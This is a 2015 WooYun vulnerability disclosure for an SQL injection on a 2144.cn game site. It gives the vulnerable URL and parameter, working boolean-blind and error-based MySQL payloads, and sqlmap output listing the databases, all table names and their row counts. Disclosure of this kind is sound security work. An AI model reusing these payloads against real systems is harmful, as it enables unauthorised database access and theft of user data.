当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141337

漏洞标题:2144游戏存在SQL注入

相关厂商:2144.cn

漏洞作者: me1ody

提交时间:2015-09-15 18:45

修复时间:2015-10-31 14:04

公开时间:2015-10-31 14:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

2144游戏网(2144.cn)创建于2006年,是目前国内最受欢迎的小游戏网站。八年来,我们一直秉承着服务用户、快乐至上的发展理念,致力提供最丰富、最优先的游戏内容。发展至今,2144游戏网已经成为一个涵盖小游戏、网页游戏、手机游戏、游戏资讯等多个领域的综合性休闲游戏平台。目前,2144游戏网已经拥有近1亿的注册用户,每天都有超过500万玩家一起在2144玩游戏,并且这些数据,每天都在以令人惊喜的速度不断刷新。

详细说明:

注入点

http://act.2144.cn/week/?id=6


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 6403=6403
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=6 AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(6081=6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
available databases [3]:
[*] act_2144_cn
[*] information_schema
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 6403=6403
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=6 AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(6081=6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
Database: act_2144_cn
[176 tables]
+-------------------------+
| act_admin |
| act_code |
| act_diy_same |
| act_diy_user |
| act_editor |
| act_element |
| act_info |
| act_photo |
| act_tp |
| act_user |
| act_vote |
| act_week |
| act_week_category |
| act_week_element |
| android_app_bh_libao |
| aoqi_bind |
| aoqi_chance |
| aoqi_invite |
| aoqi_log |
| aoqi_reward |
| aoqi_signin |
| aoqi_user |
| aoyun_ip |
| aoyun_vote |
| baba2_ip |
| baba2_vote |
| bbjq_ip |
| bbjq_vote |
| bbjx_ip |
| bbjx_vote |
| bkhy_code |
| bkhy_ip |
| common_libao |
| core_category |
| core_message |
| core_support |
| core_xmas_code |
| core_xmas_exchange |
| core_xmas_user |
| csbh_gift |
| csbh_gift_1 |
| csbh_gift_3 |
| csbh_user |
| csbh_user_1 |
| csbh_user_3 |
| csbhsjb_ip |
| csbhsjb_vote |
| csbhsqdzz |
| cwzw_libao |
| cyhx_ip |
| cyhx_vote |
| dkdb2_code |
| dkdb2_ip |
| dkdb_code |
| dkdb_ip |
| dlzs |
| dlzs_ip |
| dlzs_name |
| duanwu_2014_hao123_ip |
| duanwu_2014_hao123_vote |
| duanwu_2014_ip |
| duanwu_2014_vote |
| duanwu_ip |
| duanwu_vote |
| dyyx_ip |
| dyyx_vote |
| fnxn_ip |
| fnxn_vote |
| game_score |
| game_score_month |
| gfp_answerlog |
| gfp_vote |
| gq2011 |
| gzbs_ip |
| gzbs_vote |
| haqi_invite |
| haqi_user |
| hdl_md_list |
| hdl_users |
| hhz_ip |
| hhz_vote |
| jjxf |
| jlw2014_bind |
| jlw2014_chance |
| jlw2014_reward |
| jlw2014_signin |
| jlw_log |
| jlw_user |
| kaixue_ip |
| kaixue_vote |
| kjys_ip |
| kjys_vote |
| kkml3 |
| kkml3_ip |
| klns_ip |
| klns_vote |
| kxbb_ip |
| kxbb_vote |
| liudi |
| liudi_user |
| lol_act_ip |
| lol_act_vote |
| mole |
| mole_mimi |
| mqmm_ip |
| mqmm_vote |
| music |
| music2 |
| music_bak |
| mxh1 |
| mxh1_ip |
| mxh2 |
| mxh2_ip |
| mxh3 |
| mxh3_ip |
| mxh4 |
| mxh4_ip |
| mxh5 |
| mxh5_ip |
| mxxgs_code |
| mzfs_ip |
| mzfs_vote |
| newyear2012 |
| newyear2012_stat |
| newyear2012_visit |
| qx2015 |
| qx2015_userinfo |
| rexue_bind_2014 |
| rexue_reward_2014 |
| scheme_info |
| scheme_user |
| seer2012_ip |
| seer2012_signin |
| seer2012_vote |
| seer2013_gifts |
| seer2013_logs |
| seer2013_userinfo |
| seer2013_vote |
| seer2014_gifts |
| seer2014_logs |
| seer2014_mibi_dy |
| seer2014_userinfo |
| seer51 |
| seer51_ip |
| seer51_num |
| sexz_ip |
| sexz_vote |
| shaun_ip |
| shaun_vote |
| t_admin |
| t_operate |
| tfboy_ip |
| tfboy_vote |
| tuijian_sum |
| tuijian_user |
| uchome_act_kjys |
| web_bofangye |
| web_survey |
| worldcpu_2014_ip |
| worldcpu_2014_vote |
| wxgq_code |
| xiaozhi_ip |
| xiaozhi_vote |
| xw |
| xyj_ip |
| xyj_vote |
| zombie_ip |
| zombie_vote |
| zp_exchange_code |
| zp_gift_info |
| zp_gift_list |
| zp_lottery_info |
| zslm_code |
| zslm_survey |
| zuinan_ip |
| zuinan_vote |
+-------------------------+
Database: act_2144_cn
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| tfboy_ip | 6043089 |
| kjys_ip | 3588788 |
| bbjx_ip | 2553712 |
| kxbb_ip | 1796136 |
| baba2_ip | 1601660 |
| fnxn_ip | 1338184 |
| bbjq_ip | 957779 |
| gzbs_ip | 555666 |
| xyj_ip | 520118 |
| act_code | 270000 |
| csbh_gift | 200000 |
| cyhx_ip | 190424 |
| shaun_ip | 183099 |
| sexz_ip | 177876 |
| zombie_ip | 175523 |
| mzfs_ip | 174881 |
| dlzs | 145000 |
| klns_ip | 120392 |
| dlzs_name | 113933 |
| dlzs_ip | 110966 |
| mole | 100000 |
| game_score | 80224 |
| game_score_month | 77080 |
| hhz_ip | 72434 |
| zuinan_ip | 71143 |
| mqmm_ip | 56791 |
| act_user | 54553 |
| mxh1_ip | 49414 |
| common_libao | 44993 |
| mole_mimi | 41235 |
| jlw2014_reward | 40200 |
| csbh_gift_3 | 40000 |
| mxh3_ip | 38875 |
| newyear2012_visit | 35247 |
| csbh_gift_1 | 31013 |
| aoqi_reward | 30328 |
| seer2014_gifts | 30200 |
| dkdb2_code | 30000 |
| seer2014_logs | 29156 |
| seer2012_signin | 28560 |
| mxh2_ip | 21259 |
| rexue_reward_2014 | 20510 |
| seer2013_gifts | 20090 |
| bkhy_code | 20000 |
| android_app_bh_libao | 19998 |
| liudi | 18000 |
| dyyx_ip | 17611 |
| mxh4_ip | 17608 |
| dkdb_ip | 17446 |
| newyear2012 | 16294 |
| duanwu_2014_ip | 16140 |
| duanwu_ip | 14100 |
| jjxf | 14000 |
| worldcpu_2014_ip | 13112 |
| csbh_user_1 | 12748 |
| dkdb2_ip | 12499 |
| seer51 | 12182 |
| mxh5_ip | 12022 |
| seer2014_userinfo | 11103 |
| dkdb_code | 10350 |
| mxxgs_code | 10000 |
| uchome_act_kjys | 10000 |
| core_message | 8895 |
| zslm_survey | 8819 |
| csbh_user_3 | 8674 |
| t_operate | 6973 |
| zp_exchange_code | 6318 |
| jlw2014_signin | 6044 |
| csbh_user | 5808 |
| seer51_ip | 5727 |
| kkml3_ip | 5652 |
| kaixue_ip | 5322 |
| aoqi_signin | 5033 |
| csbhsqdzz | 4999 |
| seer2012_ip | 4227 |
| web_survey | 4175 |
| aoqi_log | 4095 |
| newyear2012_stat | 3918 |
| aoqi_chance | 3452 |
| jlw2014_chance | 3352 |
| jlw_log | 3344 |
| core_xmas_code | 3306 |
| jlw2014_bind | 3269 |
| aoqi_bind | 3172 |
| gfp_answerlog | 3152 |
| act_diy_user | 3027 |
| aoyun_ip | 2371 |
| kkml3 | 2232 |
| xiaozhi_ip | 2177 |
| seer2013_userinfo | 2118 |
| act_week_element | 2048 |
| cwzw_libao | 1500 |
| seer2013_logs | 1485 |
| bkhy_ip | 1394 |
| haqi_user | 1390 |
| core_xmas_user | 1260 |
| rexue_bind_2014 | 990 |
| wxgq_code | 942 |
| jlw_user | 844 |
| csbhsjb_ip | 834 |
| zslm_code | 600 |
| qx2015 | 542 |
| act_editor | 495 |
| lol_act_ip | 451 |
| liudi_user | 405 |
| act_week_category | 346 |
| act_photo | 330 |
| act_diy_same | 303 |
| scheme_info | 266 |
| tuijian_user | 187 |
| hdl_md_list | 105 |
| act_element | 100 |
| aoqi_invite | 99 |
| haqi_invite | 72 |
| web_bofangye | 70 |
| music | 68 |
| music2 | 68 |
| music_bak | 59 |
| core_support | 53 |
| xw | 50 |
| worldcpu_2014_vote | 32 |
| act_week | 31 |
| seer2014_mibi_dy | 27 |
| core_xmas_exchange | 23 |
| mxh3 | 17 |
| bbjx_vote | 16 |
| dyyx_vote | 16 |
| hhz_vote | 16 |
| kjys_vote | 16 |
| mqmm_vote | 16 |
| mxh2 | 16 |
| mzfs_vote | 16 |
| seer2012_vote | 16 |
| zuinan_vote | 16 |
| qx2015_userinfo | 15 |
| mxh1 | 14 |
| xyj_vote | 14 |
| mxh4 | 13 |
| mxh5 | 13 |
| t_admin | 13 |
| tuijian_sum | 13 |
| act_vote | 12 |
| scheme_user | 12 |
| sexz_vote | 12 |
| tfboy_vote | 12 |
| act_tp | 10 |
| kxbb_vote | 10 |
| act_info | 9 |
| bbjq_vote | 8 |
| csbhsjb_vote | 8 |
| gq2011 | 8 |
| shaun_vote | 8 |
| zp_gift_info | 8 |
| act_admin | 7 |
| kaixue_vote | 7 |
| aoyun_vote | 6 |
| gzbs_vote | 6 |
| baba2_vote | 5 |
| duanwu_vote | 5 |
| klns_vote | 5 |
| xiaozhi_vote | 5 |
| duanwu_2014_hao123_ip | 4 |
| lol_act_vote | 4 |
| duanwu_2014_hao123_vote | 3 |
| zp_lottery_info | 3 |
| cyhx_vote | 2 |
| duanwu_2014_vote | 2 |
| fnxn_vote | 2 |
| gfp_vote | 2 |
| seer2013_vote | 2 |
| seer51_num | 2 |
| zombie_vote | 2 |
+-------------------------+---------+

漏洞证明:

如上

修复方案:

- -

版权声明:转载请注明来源 me1ody@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-09-16 14:02

厂商回复:

感谢您对2144安全工作的支持

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-16 14:45 | me1ody ( 实习白帽子 | Rank:82 漏洞数:19 | 乌云临时工)

    @上海剑圣网络科技有限公司 - - 到我这就2rank .....